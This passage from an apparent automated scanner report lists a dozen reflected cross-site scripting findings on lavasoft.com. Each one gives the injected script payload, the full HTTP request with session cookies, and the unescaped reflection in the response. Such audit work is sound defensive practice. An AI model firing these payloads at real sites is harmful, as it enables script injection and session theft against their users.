<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft86b10'><script>alert(1)</script>64da57a4779/sites/all/modules/cck/theme/content-module.css?w'>
...[SNIP]...

1.235. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7359e'><script>alert(1)</script>46e6790cd1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites7359e'><script>alert(1)</script>46e6790cd1d/all/modules/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18274
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites7359e'><script>alert(1)</script>46e6790cd1d/all/modules/cck/theme/content-module.css'>
...[SNIP]...

1.236. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40d14'><script>alert(1)</script>a7a3b400c0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all40d14'><script>alert(1)</script>a7a3b400c0b/modules/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all40d14'><script>alert(1)</script>a7a3b400c0b/modules/cck/theme/content-module.css'>
...[SNIP]...

1.237. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2af3b'><script>alert(1)</script>983fadd018c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules2af3b'><script>alert(1)</script>983fadd018c/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules2af3b'><script>alert(1)</script>983fadd018c/cck/theme/content-module.css'>
...[SNIP]...

1.238. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da6b2'><script>alert(1)</script>50d9790c04d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cckda6b2'><script>alert(1)</script>50d9790c04d/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cckda6b2'><script>alert(1)</script>50d9790c04d/theme/content-module.css'>
...[SNIP]...

1.239. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9aea8'><script>alert(1)</script>4cffde98153 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/theme9aea8'><script>alert(1)</script>4cffde98153/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/theme9aea8'><script>alert(1)</script>4cffde98153/content-module.css'>
...[SNIP]...

1.240. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73511'><script>alert(1)</script>c5406345189 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/theme/content-module.css73511'><script>alert(1)</script>c5406345189?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/theme/content-module.css73511'><script>alert(1)</script>c5406345189'>
...[SNIP]...

1.241. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c661'><script>alert(1)</script>0a62e16d3fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft9c661'><script>alert(1)</script>0a62e16d3fe/sites/all/modules/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10635
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft9c661'><script>alert(1)</script>0a62e16d3fe/sites/all/modules/date/date.css?w'>
...[SNIP]...

1.242. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cfc3'><script>alert(1)</script>4c747395f1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites8cfc3'><script>alert(1)</script>4c747395f1e/all/modules/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18244
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites8cfc3'><script>alert(1)</script>4c747395f1e/all/modules/date/date.css'>
...[SNIP]...

1.243. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57892'><script>alert(1)</script>525c9a42ecb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all57892'><script>alert(1)</script>525c9a42ecb/modules/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all57892'><script>alert(1)</script>525c9a42ecb/modules/date/date.css'>
...[SNIP]...

1.244. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e61b2'><script>alert(1)</script>38c945aceb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modulese61b2'><script>alert(1)</script>38c945aceb9/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modulese61b2'><script>alert(1)</script>38c945aceb9/date/date.css'>
...[SNIP]...

1.245. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea05'><script>alert(1)</script>78d28eed1ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/datefea05'><script>alert(1)</script>78d28eed1ea/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/datefea05'><script>alert(1)</script>78d28eed1ea/date.css'>
...[SNIP]...

1.246. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95ae9'><script>alert(1)</script>7c6187b617e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/date/date.css95ae9'><script>alert(1)</script>7c6187b617e?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

